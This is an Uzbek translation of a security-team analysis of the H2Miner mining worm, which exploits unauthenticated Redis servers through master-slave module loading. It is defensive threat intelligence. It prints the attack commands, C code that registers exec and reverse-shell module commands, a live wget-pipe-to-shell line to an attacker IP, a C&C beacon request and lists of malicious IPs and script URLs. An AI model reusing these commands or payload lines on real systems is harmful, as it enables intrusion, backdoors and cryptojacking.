Bir kun oldin loyiham serverlaridan biriga xuddi shunday qurt hujum qildi. "Bu nima edi?" Degan savolga javob izlashda. Men Alibaba Cloud Security jamoasi tomonidan ajoyib maqola topdim. Habré-da ushbu maqolani topa olmaganim uchun uni siz uchun ayniqsa tarjima qilishga qaror qildim <3
kirish
Yaqinda Alibaba Cloud xavfsizlik guruhi H2Minerning to'satdan paydo bo'lishini aniqladi. Ushbu turdagi zararli qurtlar tizimlaringizga kirish eshigi sifatida Redis uchun avtorizatsiyaning yo'qligi yoki zaif parollardan foydalanadi, shundan so'ng u o'zining zararli modulini master-slave sinxronizatsiyasi orqali qul bilan sinxronlashtiradi va nihoyat ushbu zararli modulni hujum qilingan mashinaga yuklab oladi va zararli dasturni amalga oshiradi. ko'rsatmalar.
Ilgari tizimlaringizga hujumlar asosan rejalashtirilgan vazifalar yoki tajovuzkor Redis-ga kirgandan keyin kompyuteringizga yozilgan SSH kalitlari yordamida amalga oshirilgan. Yaxshiyamki, ruxsatni boshqarish bilan bog'liq muammolar yoki turli xil tizim versiyalari tufayli ushbu usulni tez-tez ishlatib bo'lmaydi. Biroq, zararli modulni yuklashning bu usuli tajovuzkorning buyruqlarini to'g'ridan-to'g'ri bajarishi yoki tizimingiz uchun xavfli bo'lgan qobiqqa kirish huquqiga ega bo'lishi mumkin.
Internet tarmog‘ida joylashgan Redis serverlarining ko‘pligi (1 millionga yaqin) tufayli Alibaba Cloud’ning xavfsizlik jamoasi do‘stona eslatma sifatida foydalanuvchilarga Redis’ni onlayn ravishda baham ko‘rmaslikni va o‘z parollarining mustahkamligini va ular buzilgan yoki yo‘qligini muntazam tekshirib turishni tavsiya qiladi. tez tanlash.
H2Miner
H2Miner - bu Linux-ga asoslangan tizimlar uchun tog'-kon botneti bo'lib, u tizimingizga turli yo'llar bilan kirib kelishi mumkin, jumladan Hadoop ip, Docker va Redis buyruqlarini masofadan bajarish (RCE) zaifliklarida avtorizatsiya yo'qligi. Botnet ma'lumotlaringizni qazib olish, hujumni gorizontal ravishda kengaytirish va buyruq va boshqaruv (C&C) aloqalarini qo'llab-quvvatlash uchun zararli skriptlar va zararli dasturlarni yuklab olish orqali ishlaydi.
Redis RCE
Ushbu mavzu bo'yicha bilimlar Pavel Toporkov tomonidan ZeroNights 2018 ko'rgazmasida o'rtoqlashdi. 4.0 versiyasidan so'ng Redis plaginni yuklash xususiyatini qo'llab-quvvatlaydi, bu foydalanuvchilarga Redis-ning maxsus buyruqlarini bajarish uchun C bilan tuzilgan fayllarni Redis-ga yuklash imkoniyatini beradi. Bu funksiya, garchi foydali bo'lsa-da, zaiflikni o'z ichiga oladi, unda master-qul rejimida fayllar to'liq qayta sinxronlash rejimi orqali tobe bilan sinxronlashtirilishi mumkin. Bu tajovuzkor tomonidan zararli fayllarni uzatish uchun ishlatilishi mumkin. O'tkazish tugallangandan so'ng, tajovuzkorlar modulni hujum qilingan Redis misoliga yuklaydilar va istalgan buyruqni bajaradilar.
Zararli dastur qurtlarini tahlil qilish
Yaqinda Alibaba Cloud xavfsizlik jamoasi H2Miner zararli konchilar guruhining hajmi birdaniga keskin oshganini aniqladi. Tahlillarga ko'ra, hujumning umumiy jarayoni quyidagicha:
H2Miner to'liq hujum uchun RCE Redis-dan foydalanadi. Buzg'unchilar birinchi navbatda himoyalanmagan Redis serverlariga yoki zaif parollarga ega serverlarga hujum qilishadi.
Keyin ular buyruqdan foydalanadilar config set dbfilename red2.so fayl nomini o'zgartirish uchun. Shundan so'ng, hujumchilar buyruqni bajaradilar slaveof master-slave replikatsiya xost manzilini o'rnatish uchun.
Hujum qilingan Redis nusxasi tajovuzkorga tegishli bo'lgan zararli Redis bilan master-qul aloqasini o'rnatganida, tajovuzkor fayllarni sinxronlashtirish uchun fullresync buyrug'i yordamida zararlangan modulni yuboradi. Keyin red2.so fayli hujum qilingan mashinaga yuklab olinadi. Keyin tajovuzkorlar ushbu so faylini yuklash uchun ./red2.so yuklash modulidan foydalanadilar. Modul tajovuzkorning buyruqlarini bajarishi yoki hujum qilingan mashinaga kirish uchun teskari ulanishni (orqa eshik) boshlashi mumkin.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
kabi zararli buyruqni bajargandan so'ng / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, tajovuzkor zaxira fayl nomini tiklaydi va izlarni tozalash uchun tizim modulini tushiradi. Biroq, red2.so fayli hujum qilingan mashinada qoladi. Foydalanuvchilarga Redis nusxasi papkasida bunday shubhali fayl mavjudligiga e'tibor berish tavsiya etiladi.
Resurslarni o'g'irlash uchun ba'zi zararli jarayonlarni o'ldirishdan tashqari, tajovuzkor zararli ikkilik fayllarni yuklab olish va ishga tushirish orqali zararli skriptga ergashgan. . Bu shuni anglatadiki, jarayon nomi yoki xostdagi kinsingni o'z ichiga olgan katalog nomi ushbu mashina ushbu virus bilan zararlanganligini ko'rsatishi mumkin.
Teskari muhandislik natijalariga ko'ra, zararli dastur asosan quyidagi funktsiyalarni bajaradi:
- Fayllarni yuklash va ularni bajarish
- Konchilik
- C&C aloqasini ta'minlash va tajovuzkor buyruqlarini bajarish
Ta'siringizni kengaytirish uchun tashqi skanerlash uchun masscan-dan foydalaning. Bundan tashqari, C&C serverining IP manzili dasturda qattiq kodlangan va hujumga uchragan xost HTTP so'rovlari yordamida C&C aloqa serveri bilan bog'lanadi, bu erda HTTP sarlavhasida zombi (buzilgan server) ma'lumotlari aniqlanadi.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Boshqa hujum usullari
Chuvalchang ishlatadigan manzillar va havolalar
/qarindoshlik
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
kengash
Birinchidan, Redis-ga Internetdan kirish imkoni bo'lmasligi va kuchli parol bilan himoyalangan bo'lishi kerak. Mijozlar Redis katalogida red2.so fayli yo'qligini va xostdagi fayl/jarayon nomida "qarindoshlik" yo'qligini tekshirishlari ham muhimdir.
Manba: www.habr.com